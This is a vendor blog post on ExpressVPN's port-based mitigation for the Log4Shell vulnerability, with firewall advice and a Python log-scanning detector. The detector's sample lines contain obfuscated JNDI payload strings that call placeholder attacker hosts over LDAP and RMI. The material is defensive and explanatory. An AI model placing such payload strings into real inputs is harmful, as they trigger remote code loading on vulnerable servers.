Log4j vulnerability: ExpressVPN delivers protection against Log4Shell

This post was originally published on December 14, 2021.

ExpressVPN has rolled out a network-level protective layer against the Log4j vulnerability known as Log4Shell. All ExpressVPN users now benefit from this protection, and all it takes is turning on the VPN.

The critical zero-day vulnerability (CVE-2021-44228) has been wreaking havoc across the internet, in a scenario that Wired has called “a full-blown security meltdown.” A live exploit has already been demonstrated in Minecraft—and an extensive list of services and companies has been identified as vulnerable, including Apple’s iCloud, Steam, Amazon, Tesla, and Twitter.

This new layer of protection was implemented at 09:30 GMT, December 14, 2021, and is live across all ExpressVPN servers worldwide. This means that everyone using ExpressVPN on their devices or router enjoys protection from the Apache Log4j vulnerability. The mitigation runs on ExpressVPN's servers, so no action from users is required.

Peter Membrey, Chief Architect, ExpressVPN, says: “While this vulnerability has not affected us directly and the security of our company systems is intact, we were not content to sit and watch this impact the world. Many of the apps and services our customers rely on are being affected. Given that LDAP is a networking protocol, we saw an opportunity for us as a VPN to provide an essential layer of protection against this vulnerability.

“Furthermore, while the focus on the risks posed by Log4Shell has been mostly on server infrastructure, the fact is that Log4j is also used in many client applications, and consumers are vulnerable.

“We identified Log4Shell as an LDAP- and Java RMI-reliant vulnerability, so there were two potential paths for overcoming it: port-based blocking and packet-based blocking. We implemented the port-based blocking solution immediately as it was the fastest solution to bring to market, and responding at speed was crucial to minimize the impact of this vulnerability globally. However, we will continue to work on the packet-based approach and plan to roll it out as soon as it is ready and we are confident we can do it client-side with no negative privacy impacts.”

Log4j vulnerability protection, not a fix

“To be clear, this is not a silver bullet, but it will make a significant impact on protecting internet users,” says Membrey. “The nature of this vulnerability means that just being cybersecurity-savvy won’t protect you from it—especially if you use platforms that allow chat, like Minecraft, or other gaming or social platforms.”

Additional measures to protect yourself

Aside from turning on your VPN for all internet connections, we recommend that internet users:

  • Update your firewall settings to block outbound traffic on ports you don't normally use, in particular the default ports of the callback channels seen in Log4Shell exploitation (RMI: 1099; LDAP: 389, 636, 1389, 3268, 3269). Bear in mind that this is only a partial measure: the attacker runs the LDAP or RMI server the payload points at and can put it on any port, so a rule on the default ports catches only the lazy cases. If you rely on a directory service, make sure a rule on 389/636/3268/3269 does not cut off legitimate LDAP traffic.
  • Turn on auto-updates for your applications or update them manually if a security patch is made available.
  • Continue checking as additional solutions and mitigations are identified, as the security community’s understanding of this vulnerability and its exploits is evolving. We’ll keep updating this blog post with our recommendations as we learn more.

What ExpressVPN is doing internally to counter this threat

We have verified that our codebase is either patched or not affected. Separately, we have rolled out additional protections across our network appliances and employee workstations to prevent exploitation of the vulnerability. We are actively monitoring the situation, using threat intelligence sources to watch our estate for signs of intrusion via this vulnerability, and keeping a close eye on all newly discovered software and hardware that might be affected.

About Log4Shell

Log4Shell has been given a CVSS severity rating of 10.0 out of 10.0 and been called “the bug that’s breaking the internet.”

Key to its significance is that Log4j, a logging library, is ubiquitous in Java-based internet infrastructure. As a result, virtually every major service built on Java, as well as many apps, appears to be vulnerable in some way.

Furthermore, Log4Shell requires no action from the victim: no link to click, no key to press. The attack triggers as soon as a vulnerable application logs a string the attacker controls. For example, in the exploit demonstrated in the popular game Minecraft, the malicious actor simply had to type a message into the chat box; the server logged it, Log4j evaluated the lookup embedded in it, and the attacker gained access to the server running the game.
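The firewall advice under "Additional measures" and the Minecraft chat example above correspond to the two approaches the post contrasts: port-based blocking of the callback and packet-based inspection of the payload itself. The following detector is an added example written for this page, not code ExpressVPN has published. It shows what payload inspection of a log line or chat message looks like and why port blocking alone is partial. It assumes the standard Log4Shell payload shape `${jndi:<scheme>://<host>[:<port>]/...}` and two Log4j lookup forms, `${lower:j}` and `${::-j}`, that attackers used to disguise the string `jndi`; the log lines it scans are constructed samples, and `attacker.example` and `203.0.113.10` are placeholder values.

```python
import re

# Default ports the post lists for the two callback transports used by Log4Shell payloads.
RMI_PORTS = {1099}
LDAP_PORTS = {389, 636, 1389, 3268, 3269}
BLOCKED_PORTS = RMI_PORTS | LDAP_PORTS

# Port the JNDI provider falls back to when the URL carries none (assumed defaults).
DEFAULT_PORTS = {"ldap": 389, "ldaps": 636, "rmi": 1099, "dns": 53}

# Two Log4j 2.x lookup forms widely used to hide the literal string "jndi":
#   ${lower:J} / ${upper:j}     -> case conversion of the inner text
#   ${::-j} / ${env:NOPE:-j}    -> default value of an unresolved lookup
_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")

# The resolved payload: ${jndi:<scheme>://<host>[:<port>]/...}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*//([^/${}\s]+)", re.IGNORECASE)


def deobfuscate(text: str) -> str:
    """Resolve nested ${lower:}, ${upper:} and ${...:-default} lookups innermost-first
    until the text stops changing, mirroring how Log4j itself would expand them."""
    previous = None
    while previous != text:
        previous = text
        text = _DEFAULT.sub(lambda m: m.group(1), text)
        text = _CASE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
    return text


def split_authority(authority: str):
    """Split 'host:port' into (host, port); port is None when absent. IPv6 literals are not handled."""
    host, sep, port = authority.rpartition(":")
    if sep and port.isdigit():
        return host, int(port)
    return authority, None


def analyze(line: str):
    """Return details of the first JNDI lookup in a log line, or None if there is none."""
    match = _JNDI.search(deobfuscate(line))
    if not match:
        return None
    scheme = match.group(1).lower()
    host, port = split_authority(match.group(2))
    if port is None:
        port = DEFAULT_PORTS.get(scheme)
    return {
        "payload": match.group(0),
        "scheme": scheme,
        "host": host,
        "port": port,
        # True when an egress rule on the listed default ports would have stopped the callback.
        "caught_by_port_block": port in BLOCKED_PORTS,
    }


def scan(lines):
    """Run analyze() over an iterable of log lines; return (index, finding) pairs."""
    findings = []
    for index, line in enumerate(lines):
        finding = analyze(line)
        if finding:
            findings.append((index, finding))
    return findings


# Constructed sample lines (not real traffic): Minecraft-style chat lines and
# web-server access-log lines carrying the payload in the User-Agent field.
SAMPLE_LINES = [
    "[12:01:03] [Server thread/INFO]: <steve> hello everyone",
    "[12:01:09] [Server thread/INFO]: <alex> ${jndi:ldap://203.0.113.10:1389/a}",
    '203.0.113.10 - - [14/Dec/2021:09:31:00 +0000] "GET / HTTP/1.1" 200 12 "-" '
    '"${${lower:j}ndi:rmi://attacker.example/x}"',
    '203.0.113.10 - - [14/Dec/2021:09:31:07 +0000] "GET / HTTP/1.1" 200 12 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example:8443/o}"',
    "[12:02:15] [Server thread/INFO]: <steve> the price is ${price}",
]

if __name__ == "__main__":
    for index, finding in scan(SAMPLE_LINES):
        status = "blocked by port rule" if finding["caught_by_port_block"] else "NOT blocked: non-default port"
        print(f"line {index}: {finding['scheme']}://{finding['host']}:{finding['port']} {status}")
```

Run it directly to print one line per finding. The fourth sample line, whose callback goes to port 8443 and whose `jndi` is assembled from `${::-j}` fragments, is the case an egress rule on the listed ports misses and a naive substring match for `${jndi:` misses too; the `${price}` line shows that an ordinary lookup is not flagged.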

With each passing day, more apps and services will be found to be exploitable, including many that our customers use. The massive scale of this vulnerability only underlines how important it is for affected software to be patched quickly.

